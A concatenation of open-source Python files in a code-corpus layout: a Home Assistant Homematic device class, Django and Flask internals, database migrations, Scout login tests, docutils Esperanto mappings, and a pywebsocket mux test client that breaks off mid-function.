return self._name
@property
def assumed_state(self):
"""Return true if unable to access real state of the device."""
return not self._available
@property
def available(self):
"""Return true if device is available."""
return self._available
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
attr = {}
# No data available to create attributes from
if not self.available:
return attr
# Generate an attributes list
for node, data in HM_ATTRIBUTE_SUPPORT.items():
# Is an attribute and exists for this object
if node in self._data:
value = data[1].get(self._data[node], self._data[node])
attr[data[0]] = value
# static attributes
attr['id'] = self._hmdevice.ADDRESS
attr['proxy'] = self._proxy
return attr
def link_homematic(self):
"""Connect to Homematic."""
# device is already linked
if self._connected:
return True
# Init
self._hmdevice = self._homematic.devices[self._proxy][self._address]
self._connected = True
# Check if Homematic class is okay for HA class
_LOGGER.info("Start linking %s to %s", self._address, self._name)
try:
# Init datapoints of this object
self._init_data()
if self.hass.data[DATA_DELAY]:
# We delay / pause loading of data to avoid overloading
# of CCU / Homegear when doing auto detection
time.sleep(self.hass.data[DATA_DELAY])
self._load_data_from_hm()
_LOGGER.debug("%s datastruct: %s", self._name, str(self._data))
# Link events from pyhomematic
self._subscribe_homematic_events()
self._available = not self._hmdevice.UNREACH
_LOGGER.debug("%s linking done", self._name)
# pylint: disable=broad-except
except Exception as err:
self._connected = False
_LOGGER.error("Exception while linking %s: %s",
self._address, str(err))
def _hm_event_callback(self, device, caller, attribute, value):
"""Handle all pyhomematic device events."""
_LOGGER.debug("%s received event '%s' value: %s", self._name,
attribute, value)
have_change = False
# Is data needed for this instance?
if attribute in self._data:
# Did data change?
if self._data[attribute] != value:
self._data[attribute] = value
have_change = True
# If availability has changed
if attribute == 'UNREACH':
# UNREACH is set (1) when the device is unreachable, so availability is
# its negation (matching `not self._hmdevice.UNREACH` in link_homematic)
self._available = not bool(value)
have_change = True
# If it has changed data point, update HA
if have_change:
_LOGGER.debug("%s update_ha_state after '%s'", self._name,
attribute)
self.schedule_update_ha_state()
def _subscribe_homematic_events(self):
"""Subscribe all required events to handle job."""
channels_to_sub = {0: True} # add channel 0 for UNREACH
# Push data to channels_to_sub from hmdevice metadata
for metadata in (self._hmdevice.SENSORNODE, self._hmdevice.BINARYNODE,
self._hmdevice.ATTRIBUTENODE,
self._hmdevice.WRITENODE, self._hmdevice.EVENTNODE,
self._hmdevice.ACTIONNODE):
for node, channels in metadata.items():
# Data is needed for this instance
if node in self._data:
# chan is current channel
if len(channels) == 1:
channel = channels[0]
else:
channel = self._channel
# Prepare for subscription
try:
if int(channel) >= 0:
channels_to_sub.update({int(channel): True})
except (ValueError, TypeError):
_LOGGER.error("Invalid channel in metadata from %s",
self._name)
# Set callbacks
for channel in channels_to_sub:
_LOGGER.debug(
"Subscribe channel %d from %s", channel, self._name)
self._hmdevice.setEventCallback(
callback=self._hm_event_callback, bequeath=False,
channel=channel)
def _load_data_from_hm(self):
"""Load first value from pyhomematic."""
if not self._connected:
return False
# Read data from pyhomematic
for metadata, funct in (
(self._hmdevice.ATTRIBUTENODE,
self._hmdevice.getAttributeData),
(self._hmdevice.WRITENODE, self._hmdevice.getWriteData),
(self._hmdevice.SENSORNODE, self._hmdevice.getSensorData),
(self._hmdevice.BINARYNODE, self._hmdevice.getBinaryData)):
for node in metadata:
if metadata[node] and node in self._data:
self._data[node] = funct(name=node, channel=self._channel)
return True
def _hm_set_state(self, value):
"""Set data to main datapoint."""
if self._state in self._data:
self._data[self._state] = value
def _hm_get_state(self):
"""Get data from main datapoint."""
if self._state in self._data:
return self._data[self._state]
return None
def _init_data(self):
"""Generate a data dict (self._data) from the Homematic metadata."""
# Add all attributes to data dict
for data_note in self._hmdevice.ATTRIBUTENODE:
self._data.update({data_note: STATE_UNKNOWN})
# Init device-specific data
self._init_data_struct()
def _init_data_struct(self):
"""Generate a data dict from the Homematic device metadata."""
raise NotImplementedError
| mit |
DrMeers/django | tests/one_to_one/models.py | 26 | 1605 | """
10. One-to-one relationships
To define a one-to-one relationship, use ``OneToOneField()``.
In this example, a ``Place`` optionally can be a ``Restaurant``.
"""
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Place(models.Model):
name = models.CharField(max_length=50)
address = models.CharField(max_length=80)
def __str__(self):
return "%s the place" % self.name
@python_2_unicode_compatible
class Restaurant(models.Model):
place = models.OneToOneField(Place, primary_key=True)
serves_hot_dogs = models.BooleanField(default=False)
serves_pizza = models.BooleanField(default=False)
def __str__(self):
return "%s the restaurant" % self.place.name
@python_2_unicode_compatible
class Waiter(models.Model):
restaurant = models.ForeignKey(Restaurant)
name = models.CharField(max_length=50)
def __str__(self):
return "%s the waiter at %s" % (self.name, self.restaurant)
class ManualPrimaryKey(models.Model):
primary_key = models.CharField(max_length=10, primary_key=True)
name = models.CharField(max_length=50)
class RelatedModel(models.Model):
link = models.OneToOneField(ManualPrimaryKey)
name = models.CharField(max_length=50)
@python_2_unicode_compatible
class MultiModel(models.Model):
link1 = models.OneToOneField(Place)
link2 = models.OneToOneField(ManualPrimaryKey)
name = models.CharField(max_length=50)
def __str__(self):
return "Multimodel %s" % self.name
| bsd-3-clause |
justinlulejian/fah-gae | lib/flask/globals.py | 783 | 1137 | # -*- coding: utf-8 -*-
"""
flask.globals
~~~~~~~~~~~~~
Defines all the global objects that are proxies to the current
active context.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from functools import partial
from werkzeug.local import LocalStack, LocalProxy
def _lookup_req_object(name):
top = _request_ctx_stack.top
if top is None:
raise RuntimeError('working outside of request context')
return getattr(top, name)
def _lookup_app_object(name):
top = _app_ctx_stack.top
if top is None:
raise RuntimeError('working outside of application context')
return getattr(top, name)
def _find_app():
top = _app_ctx_stack.top
if top is None:
raise RuntimeError('working outside of application context')
return top.app
# context locals
_request_ctx_stack = LocalStack()
_app_ctx_stack = LocalStack()
current_app = LocalProxy(_find_app)
request = LocalProxy(partial(_lookup_req_object, 'request'))
session = LocalProxy(partial(_lookup_req_object, 'session'))
g = LocalProxy(partial(_lookup_app_object, 'g'))
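# Illustrative use of these proxies (a sketch; route and names are examples):
#   from flask import Flask, request, g
#   app = Flask(__name__)
#   @app.route('/')
#   def index():
#       g.user = request.args.get('user', 'anonymous')
#       return g.user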
| mit |
Nitrate/Nitrate | src/tcms/testruns/migrations/0006_set_assignee_and_tested_by_to_null_if_user_is_deleted.py | 2 | 1101 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-11-18 14:51
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("testruns", "0005_set_run_default_tester_to_null_if_user_is_deleted"),
]
operations = [
migrations.AlterField(
model_name="testcaserun",
name="assignee",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="case_run_assignee",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AlterField(
model_name="testcaserun",
name="tested_by",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="case_run_tester",
to=settings.AUTH_USER_MODEL,
),
),
]
| gpl-2.0 |
Clinical-Genomics/scout | tests/server/blueprints/login/test_views.py | 1 | 2083 | # -*- coding: utf-8 -*-
from flask import url_for
from flask_ldap3_login.forms import LDAPLoginForm
from flask_login import current_user
from scout.server.extensions import store
def test_unathorized_login(app, institute_obj, case_obj):
"""Test failed authentication against scout database"""
# GIVEN an initialized app
# WHEN trying to access scout with the email of a non-existing user
with app.test_client() as client:
resp = client.get(url_for("login.login", email="fakey_user@email.com"))
# THEN response should redirect to user authentication form (index page)
assert resp.status_code == 302
# And current user should NOT be authenticated
assert current_user.is_authenticated is False
def test_authorized_login(app, user_obj):
"""Test successful authentication against scout database"""
# GIVEN an initialized app
# WHEN trying to access scout with the email of an existing user
with app.test_client() as client:
resp = client.get(url_for("login.login", email=user_obj["email"]))
# THEN response should redirect to user institutes
assert resp.status_code == 302
# And current user should be authenticated
assert current_user.is_authenticated
def test_ldap_login(ldap_app, user_obj, monkeypatch):
"""Test authentication using LDAP"""
# Given a MonkeyPatched flask_ldap3_login authenticate functionality
def validate_ldap(*args, **kwargs):
return True
def return_user(*args, **kwargs):
return user_obj
monkeypatch.setattr(LDAPLoginForm, "validate_on_submit", validate_ldap)
monkeypatch.setattr(store, "user", return_user)
# GIVEN an initialized app with LDAP config params
with ldap_app.test_client() as client:
# When submitting LDAP username and password
form_data = {"username": "test_user", "password": "test_password"}
resp = client.post(url_for("login.login", **form_data))
# THEN current user should be authenticated
assert current_user.is_authenticated
| bsd-3-clause |
ol-loginov/intellij-community | python/helpers/docutils/parsers/rst/languages/eo.py | 57 | 3722 | # $Id: eo.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: Marcelo Huerta San Martin <richieadler@users.sourceforge.net>
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Esperanto-language mappings for language-dependent features of
reStructuredText.
"""
__docformat__ = 'reStructuredText'
directives = {
# language-dependent: fixed
u'atentu': 'attention',
u'zorgu': 'caution',
u'dangxero': 'danger',
u'dan\u011dero': 'danger',
u'eraro': 'error',
u'spuro': 'hint',
u'grava': 'important',
u'noto': 'note',
u'helpeto': 'tip',
u'averto': 'warning',
u'admono': 'admonition',
u'flankteksto': 'sidebar',
u'temo': 'topic',
u'linea-bloko': 'line-block',
u'analizota-literalo': 'parsed-literal',
u'rubriko': 'rubric',
u'epigrafo': 'epigraph',
u'elstarajxoj': 'highlights',
u'elstara\u0135oj': 'highlights',
u'ekstera-citajxo': 'pull-quote',
u'ekstera-cita\u0135o': 'pull-quote',
u'kombinajxo': 'compound',
u'kombina\u0135o': 'compound',
u'tekstingo': 'container',
u'enhavilo': 'container',
#'questions': 'questions',
#'qa': 'questions',
#'faq': 'questions',
u'tabelo': 'table',
u'tabelo-vdk': 'csv-table', # "valoroj disigitaj per komoj"
u'tabelo-csv': 'csv-table',
u'tabelo-lista': 'list-table',
u'meta': 'meta',
#'imagemap': 'imagemap',
u'bildo': 'image',
u'figuro': 'figure',
u'inkludi': 'include',
u'senanaliza': 'raw',
u'anstatauxi': 'replace',
u'anstata\u016di': 'replace',
u'unicode': 'unicode',
u'dato': 'date',
u'klaso': 'class',
u'rolo': 'role',
u'preterlasita-rolo': 'default-role',
u'titolo': 'title',
u'enhavo': 'contents',
u'seknum': 'sectnum',
u'sekcia-numerado': 'sectnum',
u'kapsekcio': 'header',
u'piedsekcio': 'footer',
#'footnotes': 'footnotes',
#'citations': 'citations',
u'celaj-notoj': 'target-notes',
u'restructuredtext-test-directive': 'restructuredtext-test-directive'}
"""Esperanto name to registered (in directives/__init__.py) directive name
mapping."""
roles = {
# language-dependent: fixed
u'mallongigo': 'abbreviation',
u'mall': 'abbreviation',
u'komenclitero': 'acronym',
u'kl': 'acronym',
u'indekso': 'index',
u'i': 'index',
u'subskribo': 'subscript',
u'sub': 'subscript',
u'supraskribo': 'superscript',
u'sup': 'superscript',
u'titola-referenco': 'title-reference',
u'titolo': 'title-reference',
u't': 'title-reference',
u'pep-referenco': 'pep-reference',
u'pep': 'pep-reference',
u'rfc-referenco': 'rfc-reference',
u'rfc': 'rfc-reference',
u'emfazo': 'emphasis',
u'forta': 'strong',
u'litera': 'literal',
u'nomita-referenco': 'named-reference',
u'nenomita-referenco': 'anonymous-reference',
u'piednota-referenco': 'footnote-reference',
u'citajxo-referenco': 'citation-reference',
u'cita\u0135o-referenco': 'citation-reference',
u'anstatauxa-referenco': 'substitution-reference',
u'anstata\u016da-referenco': 'substitution-reference',
u'celo': 'target',
u'uri-referenco': 'uri-reference',
u'uri': 'uri-reference',
u'url': 'uri-reference',
u'senanaliza': 'raw',
}
"""Mapping of Esperanto role names to canonical role names for interpreted text.
"""
| apache-2.0 |
qedsoftware/commcare-hq | corehq/apps/smsbillables/migrations/0005_update_http_backend_criteria.py | 1 | 1081 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from corehq.apps.smsbillables.models import SmsGatewayFeeCriteria
from corehq.messaging.smsbackends.sislog.models import SQLSislogBackend
from corehq.messaging.smsbackends.yo.models import SQLYoBackend
from corehq.sql_db.operations import HqRunPython
def update_http_backend_criteria(apps, schema_editor):
SmsGatewayFeeCriteria.objects.filter(
backend_api_id='HTTP',
backend_instance='7ddf3301c093b793c6020ebf755adb6f'
).update(
backend_api_id=SQLSislogBackend.get_api_id(),
backend_instance=None,
)
SmsGatewayFeeCriteria.objects.filter(
backend_api_id='HTTP',
backend_instance='95a4f0929cddb966e292e70a634da716'
).update(
backend_api_id=SQLYoBackend.get_api_id(),
backend_instance=None,
)
class Migration(migrations.Migration):
dependencies = [
('smsbillables', '0004_bootstrap_smsgh_rates'),
]
operations = {
HqRunPython(update_http_backend_criteria),
}
| bsd-3-clause |
indashnet/InDashNet.Open.UN2000 | android/external/chromium-trace/trace-viewer/third_party/pywebsocket/src/test/mux_client_for_testing.py | 29 | 27698 | #!/usr/bin/env python
#
# Copyright 2012, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""WebSocket client utility for testing mux extension.
This code should be independent from mod_pywebsocket. See the comment of
client_for_testing.py.
NOTE: Unlike client_for_testing.py, this code is far from robust.
"""
import Queue
import base64
import collections
import email
import email.parser
import logging
import math
import os
import random
import socket
import struct
import threading
from mod_pywebsocket import util
from test import client_for_testing
_CONTROL_CHANNEL_ID = 0
_DEFAULT_CHANNEL_ID = 1
_MUX_OPCODE_ADD_CHANNEL_REQUEST = 0
_MUX_OPCODE_ADD_CHANNEL_RESPONSE = 1
_MUX_OPCODE_FLOW_CONTROL = 2
_MUX_OPCODE_DROP_CHANNEL = 3
_MUX_OPCODE_NEW_CHANNEL_SLOT = 4
class _ControlBlock:
def __init__(self, opcode):
self.opcode = opcode
def _parse_handshake_response(response):
status_line, header_lines = response.split('\r\n', 1)
words = status_line.split(' ')
if len(words) < 3:
raise ValueError('Bad Status-Line syntax %r' % status_line)
[version, response_code] = words[:2]
if version != 'HTTP/1.1':
raise ValueError('Bad response version %r' % version)
if response_code != '101':
raise ValueError('Bad response code %r ' % response_code)
headers = email.parser.Parser().parsestr(header_lines)
return headers
def _parse_channel_id(data, offset=0):
length = len(data)
remaining = length - offset
if remaining <= 0:
raise Exception('No channel id found')
channel_id = ord(data[offset])
channel_id_length = 1
if channel_id & 0xe0 == 0xe0:
if remaining < 4:
raise Exception('Invalid channel id format')
channel_id = struct.unpack('!L',
data[offset:offset+4])[0] & 0x1fffffff
channel_id_length = 4
elif channel_id & 0xc0 == 0xc0:
if remaining < 3:
raise Exception('Invalid channel id format')
channel_id = (((channel_id & 0x1f) << 16) +
struct.unpack('!H', data[offset+1:offset+3])[0])
channel_id_length = 3
elif channel_id & 0x80 == 0x80:
if remaining < 2:
raise Exception('Invalid channel id format')
channel_id = struct.unpack('!H', data[offset:offset+2])[0] & 0x3fff
channel_id_length = 2
return channel_id, channel_id_length
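# Wire-format examples for the variable-length channel id (illustrative):
#   _parse_channel_id('\x05') -> (5, 1)      # 1 byte, id < 2**7
#   _parse_channel_id('\x81\x2c') -> (300, 2) # 2 bytes, top bit set, id < 2**14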
def _read_number(data, size_of_size, offset=0):
if size_of_size == 1:
return ord(data[offset])
elif size_of_size == 2:
return struct.unpack('!H', data[offset:offset+2])[0]
elif size_of_size == 3:
return ((ord(data[offset]) << 16)
+ struct.unpack('!H', data[offset+1:offset+3])[0])
elif size_of_size == 4:
return struct.unpack('!L', data[offset:offset+4])[0]
else:
raise Exception('Invalid "size of size" in control block')
def _parse_control_block_specific_data(data, size_of_size, offset=0):
remaining = len(data) - offset
if remaining < size_of_size:
raise Exception('Invalid control block received')
size = _read_number(data, size_of_size, offset)
start_position = offset + size_of_size
end_position = start_position + size
if len(data) < end_position:
raise Exception('Invalid size of control block (%d < %d)' % (
len(data), end_position))
return data[start_position:end_position], size_of_size + size
def _parse_control_blocks(data):
blocks = []
length = len(data)
pos = 0
while pos < length:
first_byte = ord(data[pos])
pos += 1
opcode = (first_byte >> 5) & 0x7
block = _ControlBlock(opcode)
# TODO(bashi): Support more opcode
if opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
block.encode = (first_byte >> 2) & 3
block.rejected = (first_byte >> 4) & 1
channel_id, advance = _parse_channel_id(data, pos)
block.channel_id = channel_id
pos += advance
size_of_size = (first_byte & 3) + 1
encoded_handshake, advance = _parse_control_block_specific_data(
data, size_of_size, pos)
block.encoded_handshake = encoded_handshake
pos += advance
blocks.append(block)
elif opcode == _MUX_OPCODE_DROP_CHANNEL:
block.mux_error = (first_byte >> 4) & 1
channel_id, channel_id_length = _parse_channel_id(data, pos)
block.channel_id = channel_id
pos += channel_id_length
size_of_size = first_byte & 3
reason, size = _parse_control_block_specific_data(
data, size_of_size, pos)
block.reason = reason
pos += size
blocks.append(block)
elif opcode == _MUX_OPCODE_FLOW_CONTROL:
channel_id, advance = _parse_channel_id(data, pos)
block.channel_id = channel_id
pos += advance
size_of_quota = (first_byte & 3) + 1
block.send_quota = _read_number(data, size_of_quota, pos)
pos += size_of_quota
blocks.append(block)
elif opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
size_of_slots = ((first_byte >> 2) & 3) + 1
size_of_quota = (first_byte & 3) + 1
block.slots = _read_number(data, size_of_slots, pos)
pos += size_of_slots
block.send_quota = _read_number(data, size_of_quota, pos)
pos += size_of_quota
blocks.append(block)
else:
raise Exception(
'Unsupported mux opcode %d received' % opcode)
return blocks
def _encode_channel_id(channel_id):
if channel_id < 0:
raise ValueError('Channel id %d must not be negative' % channel_id)
if channel_id < 2 ** 7:
return chr(channel_id)
if channel_id < 2 ** 14:
return struct.pack('!H', 0x8000 + channel_id)
if channel_id < 2 ** 21:
first = chr(0xc0 + (channel_id >> 16))
return first + struct.pack('!H', channel_id & 0xffff)
if channel_id < 2 ** 29:
return struct.pack('!L', 0xe0000000 + channel_id)
raise ValueError('Channel id %d is too large' % channel_id)
def _size_of_number_in_bytes_minus_1(number):
# Calculate the minimum number of bytes minus 1 that are required to store
# the data.
if number < 0:
raise ValueError('Invalid number: %d' % number)
elif number < 2 ** 8:
return 0
elif number < 2 ** 16:
return 1
elif number < 2 ** 24:
return 2
elif number < 2 ** 32:
return 3
else:
raise ValueError('Invalid number %d' % number)
def _encode_number(number):
if number < 2 ** 8:
return chr(number)
elif number < 2 ** 16:
return struct.pack('!H', number)
elif number < 2 ** 24:
return chr(number >> 16) + struct.pack('!H', number & 0xffff)
else:
return struct.pack('!L', number)
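# Added sketch: _size_of_number_in_bytes_minus_1(n) names the wire width
# (minus one) that _encode_number(n) actually produces, which is the
# invariant the control-block builders below rely on.
def _example_number_encoding():
    for n in (0, 255, 300, 2 ** 20, 2 ** 31):
        assert len(_encode_number(n)) == _size_of_number_in_bytes_minus_1(n) + 1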
def _create_add_channel_request(channel_id, encoded_handshake,
encoding=0):
length = len(encoded_handshake)
size_of_length = _size_of_number_in_bytes_minus_1(length)
first_byte = ((_MUX_OPCODE_ADD_CHANNEL_REQUEST << 5) | (encoding << 2) |
size_of_length)
encoded_length = _encode_number(length)
return (chr(first_byte) + _encode_channel_id(channel_id) +
encoded_length + encoded_handshake)
def _create_flow_control(channel_id, replenished_quota):
size_of_quota = _size_of_number_in_bytes_minus_1(replenished_quota)
first_byte = ((_MUX_OPCODE_FLOW_CONTROL << 5) | size_of_quota)
return (chr(first_byte) + _encode_channel_id(channel_id) +
_encode_number(replenished_quota))
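# Added usage sketch (assumes an established stream and logical channel 2):
# control blocks travel as binary frames addressed to the control channel,
# so replenishing 1024 bytes of quota on channel 2 looks like:
#   payload = (_encode_channel_id(_CONTROL_CHANNEL_ID) +
#              _create_flow_control(2, 1024))
#   stream.send_binary(payload)
# MuxClient.send_flow_control() below does exactly this, and additionally
# bumps the local receive quota.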
class _MuxReaderThread(threading.Thread):
"""Mux reader thread.
Reads frames and passes them to the mux client. This thread accesses
private functions/variables of the mux client.
"""
def __init__(self, mux):
threading.Thread.__init__(self)
self.setDaemon(True)
self._mux = mux
self._stop_requested = False
def _receive_message(self):
first_opcode = None
pending_payload = []
while not self._stop_requested:
fin, rsv1, rsv2, rsv3, opcode, payload_length = (
client_for_testing.read_frame_header(self._mux._socket))
if not first_opcode:
if opcode == client_for_testing.OPCODE_TEXT:
raise Exception('Received a text message on physical '
'connection')
if opcode == client_for_testing.OPCODE_CONTINUATION:
raise Exception('Received an intermediate frame but '
'fragmentation was not started')
if (opcode == client_for_testing.OPCODE_BINARY or
opcode == client_for_testing.OPCODE_PING or
opcode == client_for_testing.OPCODE_PONG or
opcode == client_for_testing.OPCODE_CLOSE):
first_opcode = opcode
else:
raise Exception('Received an undefined opcode frame: %d' %
opcode)
elif opcode != client_for_testing.OPCODE_CONTINUATION:
raise Exception('Received a new opcode before '
'terminating fragmentation')
payload = client_for_testing.receive_bytes(
self._mux._socket, payload_length)
if self._mux._incoming_frame_filter is not None:
payload = self._mux._incoming_frame_filter.filter(payload)
pending_payload.append(payload)
if fin:
break
if self._stop_requested:
return None, None
message = ''.join(pending_payload)
return first_opcode, message
def request_stop(self):
self._stop_requested = True
def run(self):
try:
while not self._stop_requested:
# opcode is OPCODE_BINARY or control opcodes when a message
# is successfully received.
opcode, message = self._receive_message()
if not opcode:
return
if opcode == client_for_testing.OPCODE_BINARY:
channel_id, advance = _parse_channel_id(message)
self._mux._dispatch_frame(channel_id, message[advance:])
else:
self._mux._process_control_message(opcode, message)
finally:
self._mux._notify_reader_done()
class _InnerFrame(object):
def __init__(self, fin, rsv1, rsv2, rsv3, opcode, payload):
self.fin = fin
self.rsv1 = rsv1
self.rsv2 = rsv2
self.rsv3 = rsv3
self.opcode = opcode
self.payload = payload
class _LogicalChannelData(object):
def __init__(self):
self.queue = Queue.Queue()
self.send_quota = 0
self.receive_quota = 0
class MuxClient(object):
"""WebSocket mux client.
Note that this class is NOT thread-safe. Do not access an instance of this
class from multiple threads at the same time.
"""
def __init__(self, options):
self._logger = util.get_class_logger(self)
self._options = options
self._options.enable_mux()
self._stream = None
self._socket = None
self._handshake = client_for_testing.WebSocketHandshake(self._options)
self._incoming_frame_filter = None
self._outgoing_frame_filter = None
self._is_active = False
self._read_thread = None
self._control_blocks_condition = threading.Condition()
self._control_blocks = []
self._channel_slots = collections.deque()
self._logical_channels_condition = threading.Condition()
self._logical_channels = {}
self._timeout = 2
self._physical_connection_close_event = None
self._physical_connection_close_message = None
def _parse_inner_frame(self, data):
if len(data) == 0:
raise Exception('Invalid encapsulated frame received')
first_byte = ord(data[0])
fin = (first_byte >> 7) & 1
rsv1 = (first_byte >> 6) & 1
rsv2 = (first_byte >> 5) & 1
rsv3 = (first_byte >> 4) & 1
opcode = first_byte & 0xf
if self._outgoing_frame_filter:
payload = self._outgoing_frame_filter.filter(
data[1:])
else:
payload = data[1:]
return _InnerFrame(fin, rsv1, rsv2, rsv3, opcode, payload)
def _process_mux_control_blocks(self):
for block in self._control_blocks:
if block.opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
# AddChannelResponse will be handled in add_channel().
continue
elif block.opcode == _MUX_OPCODE_FLOW_CONTROL:
try:
self._logical_channels_condition.acquire()
if not block.channel_id in self._logical_channels:
raise Exception('Invalid flow control received for '
'channel id %d' % block.channel_id)
self._logical_channels[block.channel_id].send_quota += (
block.send_quota)
self._logical_channels_condition.notify()
finally:
self._logical_channels_condition.release()
elif block.opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
self._channel_slots.extend([block.send_quota] * block.slots)
def _dispatch_frame(self, channel_id, payload):
if channel_id == _CONTROL_CHANNEL_ID:
try:
self._control_blocks_condition.acquire()
self._control_blocks += _parse_control_blocks(payload)
self._process_mux_control_blocks()
self._control_blocks_condition.notify()
finally:
self._control_blocks_condition.release()
else:
try:
self._logical_channels_condition.acquire()
if not channel_id in self._logical_channels:
raise Exception('Received logical frame on channel id '
'%d, which is not established' %
channel_id)
inner_frame = self._parse_inner_frame(payload)
self._logical_channels[channel_id].receive_quota -= (
len(inner_frame.payload))
if self._logical_channels[channel_id].receive_quota < 0:
raise Exception('The server violates quota on '
'channel id %d' % channel_id)
finally:
self._logical_channels_condition.release()
self._logical_channels[channel_id].queue.put(inner_frame)
def _process_control_message(self, opcode, message):
# Ping/Pong are not supported.
if opcode == client_for_testing.OPCODE_CLOSE:
self._physical_connection_close_message = message
if self._is_active:
self._stream.send_close(
code=client_for_testing.STATUS_NORMAL_CLOSURE, reason='')
self._read_thread.request_stop()
if self._physical_connection_close_event:
self._physical_connection_close_event.set()
def _notify_reader_done(self):
self._logger.debug('Read thread terminated.')
self.close_socket()
def _assert_channel_slot_available(self):
try:
self._control_blocks_condition.acquire()
if len(self._channel_slots) == 0:
# Wait once
self._control_blocks_condition.wait(timeout=self._timeout)
finally:
self._control_blocks_condition.release()
if len(self._channel_slots) == 0:
raise Exception('Failed to receive NewChannelSlot')
def _assert_send_quota_available(self, channel_id):
try:
self._logical_channels_condition.acquire()
if self._logical_channels[channel_id].send_quota == 0:
# Wait once
self._logical_channels_condition.wait(timeout=self._timeout)
finally:
self._logical_channels_condition.release()
if self._logical_channels[channel_id].send_quota == 0:
raise Exception('Failed to receive FlowControl for channel id %d' %
channel_id)
def connect(self):
self._socket = socket.socket()
self._socket.settimeout(self._options.socket_timeout)
self._socket.connect((self._options.server_host,
self._options.server_port))
if self._options.use_tls:
self._socket = _TLSSocket(self._socket)
self._handshake.handshake(self._socket)
self._stream = client_for_testing.WebSocketStream(
self._socket, self._handshake)
self._logical_channels[_DEFAULT_CHANNEL_ID] = _LogicalChannelData()
self._read_thread = _MuxReaderThread(self)
self._read_thread.start()
self._assert_channel_slot_available()
self._assert_send_quota_available(_DEFAULT_CHANNEL_ID)
self._is_active = True
self._logger.info('Connection established')
def add_channel(self, channel_id, options):
if not self._is_active:
raise Exception('Mux client is not active')
if channel_id in self._logical_channels:
raise Exception('Channel id %d already exists' % channel_id)
try:
send_quota = self._channel_slots.popleft()
except IndexError as e:
raise Exception('No channel slots: %r' % e)
# Create AddChannel request
request_line = 'GET %s HTTP/1.1\r\n' % options.resource
fields = []
fields.append('Upgrade: websocket\r\n')
fields.append('Connection: Upgrade\r\n')
if options.server_port == client_for_testing.DEFAULT_PORT:
fields.append('Host: %s\r\n' % options.server_host.lower())
else:
fields.append('Host: %s:%d\r\n' % (options.server_host.lower(),
options.server_port))
fields.append('Origin: %s\r\n' % options.origin.lower())
original_key = os.urandom(16)
key = base64.b64encode(original_key)
fields.append('Sec-WebSocket-Key: %s\r\n' % key)
fields.append('Sec-WebSocket-Version: 13\r\n')
if len(options.extensions) > 0:
fields.append('Sec-WebSocket-Extensions: %s\r\n' %
', '.join(options.extensions))
handshake = request_line + ''.join(fields) + '\r\n'
add_channel_request = _create_add_channel_request(
channel_id, handshake)
payload = _encode_channel_id(_CONTROL_CHANNEL_ID) + add_channel_request
self._stream.send_binary(payload)
# Wait for AddChannelResponse
self._logger.debug('Waiting for AddChannelResponse for the request...')
response = None
try:
self._control_blocks_condition.acquire()
while True:
for block in self._control_blocks:
if block.opcode != _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
continue
if block.channel_id == channel_id:
response = block
self._control_blocks.remove(response)
break
if response:
break
self._control_blocks_condition.wait(self._timeout)
if not self._is_active:
raise Exception('AddChannelRequest timed out')
finally:
self._control_blocks_condition.release()
# Validate AddChannelResponse
if response.rejected:
raise Exception('The server rejected AddChannelRequest')
fields = _parse_handshake_response(response.encoded_handshake)
if not 'upgrade' in fields:
raise Exception('No Upgrade header')
if fields['upgrade'] != 'websocket':
raise Exception('Wrong Upgrade header')
if not 'connection' in fields:
raise Exception('No Connection header')
if fields['connection'] != 'Upgrade':
raise Exception('Wrong Connection header')
if not 'sec-websocket-accept' in fields:
raise Exception('No Sec-WebSocket-Accept header')
accept = fields['sec-websocket-accept']
try:
decoded_accept = base64.b64decode(accept)
except TypeError:
raise Exception(
'Illegal value for header Sec-WebSocket-Accept: ' + accept)
if len(decoded_accept) != 20:
raise Exception(
'Decoded value of Sec-WebSocket-Accept is not 20-byte long')
original_expected_accept = util.sha1_hash(
